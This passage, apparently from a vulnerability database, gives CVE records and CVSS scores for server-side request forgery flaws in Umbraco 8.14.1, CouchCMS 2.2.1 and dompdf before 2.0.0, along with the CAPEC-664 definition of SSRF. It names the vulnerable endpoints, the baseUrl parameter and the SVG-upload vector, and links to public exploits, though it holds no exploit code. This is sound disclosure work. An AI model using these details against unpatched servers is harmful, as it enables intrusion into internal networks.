"timestamp": "2026-01-15T16:40:24.992298Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-15T16:40:33.352Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Umbraco",
"vendor": "umbraco",
"versions": [
{
"status": "affected",
"version": "8.14.1"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:umbraco:umbraco_forms:8.14.1:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "NgoAnhDuc"
}
],
"datePublic": "2021-10-29T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Umbraco CMS v8.14.1 contains a server-side request forgery vulnerability that allows attackers to manipulate baseUrl parameters in multiple dashboard and help controller endpoints. Attackers can craft malicious requests to the GetContextHelpForPage, GetRemoteDashboardContent, and GetRemoteDashboardCss endpoints to trigger unauthorized server-side requests to external hosts."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:06:05.989Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-50462",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/50462"
},
{
"name": "Umbraco Official Homepage",
"tags": [
"product"
],
"url": "https://our.umbraco.com/"
},
{
"name": "Umbraco CMS Release Notes",
"tags": [
"product"
],
"url": "https://releases.umbraco.com/all-releases"
}
],
"title": "Umbraco v8.14.1 - \u0027baseUrl\u0027 SSRF",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47776",
"datePublished": "2026-01-15T15:52:13.737Z",
"dateReserved": "2026-01-14T14:39:44.736Z",
"dateUpdated": "2026-04-07T14:06:05.989Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47958 (GCVE-0-2021-47958)
Vulnerability from cvelistv5 – Published: 2026-05-15 18:36 – Updated: 2026-05-15 22:56
VLAI
Title
CouchCMS 2.2.1 Server-Side Request Forgery via SVG upload
Summary
CouchCMS 2.2.1 contains a server-side request forgery vulnerability that allows authenticated attackers to make arbitrary HTTP requests by uploading malicious SVG files. Attackers can upload SVG files containing external entity references through the browse.php endpoint to access internal services and resources.
Severity
4.3 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/49675 | exploit |
| https://github.com/CouchCMS/CouchCMS | product |
| https://www.vulncheck.com/advisories/couchcms-ser… | third-party-advisory |
Date Public
2021-01-25 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47958",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-15T22:12:37.787017Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T22:56:00.813Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "CouchCMS",
"vendor": "CouchCMS",
"versions": [
{
"status": "affected",
"version": "2.2.1"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:couchcms:couchcms:2.3:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:2.2.1:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:2.2:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:1.3.5:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:1.4:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:1.4.5:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:1.4.7:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:2.0:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:couchcms:couchcms:2.1:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "xxcdd"
}
],
"datePublic": "2021-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "CouchCMS 2.2.1 contains a server-side request forgery vulnerability that allows authenticated attackers to make arbitrary HTTP requests by uploading malicious SVG files. Attackers can upload SVG files containing external entity references through the browse.php endpoint to access internal services and resources."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T18:36:26.824Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-49675",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/49675"
},
{
"name": "Official Product Homepage",
"tags": [
"product"
],
"url": "https://github.com/CouchCMS/CouchCMS"
},
{
"name": "VulnCheck Advisory: CouchCMS 2.2.1 Server-Side Request Forgery via SVG upload",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/couchcms-server-side-request-forgery-via-svg-upload"
}
],
"title": "CouchCMS 2.2.1 Server-Side Request Forgery via SVG upload",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47958",
"datePublished": "2026-05-15T18:36:26.824Z",
"dateReserved": "2026-02-01T11:24:18.720Z",
"dateUpdated": "2026-05-15T22:56:00.813Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2022-0085 (GCVE-0-2022-0085)
Vulnerability from cvelistv5 – Published: 2022-06-28 15:00 – Updated: 2024-08-02 23:18
VLAI
Title
Server-Side Request Forgery (SSRF) in dompdf/dompdf
Summary
Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0.
Severity
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://huntr.dev/bounties/73dbcc78-5ba9-492f-913… | x_refsource_CONFIRM |
| https://github.com/dompdf/dompdf/commit/bb1ef6501… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| dompdf | dompdf/dompdf |
Affected:
unspecified , < 2.0.0
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:18:41.571Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://huntr.dev/bounties/73dbcc78-5ba9-492f-9133-13bbc9f31236"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/dompdf/dompdf/commit/bb1ef65011a14730b7cfbe73506b4bb8a03704bd"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "dompdf/dompdf",
"vendor": "dompdf",
"versions": [
{
"lessThan": "2.0.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-06-28T15:00:15.000Z",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://huntr.dev/bounties/73dbcc78-5ba9-492f-9133-13bbc9f31236"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/dompdf/dompdf/commit/bb1ef65011a14730b7cfbe73506b4bb8a03704bd"
}
],
"source": {
"advisory": "73dbcc78-5ba9-492f-9133-13bbc9f31236",
"discovery": "EXTERNAL"
},
"title": "Server-Side Request Forgery (SSRF) in dompdf/dompdf",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2022-0085",
"STATE": "PUBLIC",
"TITLE": "Server-Side Request Forgery (SSRF) in dompdf/dompdf"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "dompdf/dompdf",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "2.0.0"
}
]
}
}
]
},
"vendor_name": "dompdf"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-918 Server-Side Request Forgery (SSRF)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://huntr.dev/bounties/73dbcc78-5ba9-492f-9133-13bbc9f31236",
"refsource": "CONFIRM",
"url": "https://huntr.dev/bounties/73dbcc78-5ba9-492f-9133-13bbc9f31236"
},
{
"name": "https://github.com/dompdf/dompdf/commit/bb1ef65011a14730b7cfbe73506b4bb8a03704bd",
"refsource": "MISC",
"url": "https://github.com/dompdf/dompdf/commit/bb1ef65011a14730b7cfbe73506b4bb8a03704bd"
}
]
},
"source": {
"advisory": "73dbcc78-5ba9-492f-9133-13bbc9f31236",
"discovery": "EXTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2022-0085",
"datePublished": "2022-06-28T15:00:15.000Z",
"dateReserved": "2022-01-03T00:00:00.000Z",
"dateUpdated": "2024-08-02T23:18:41.571Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.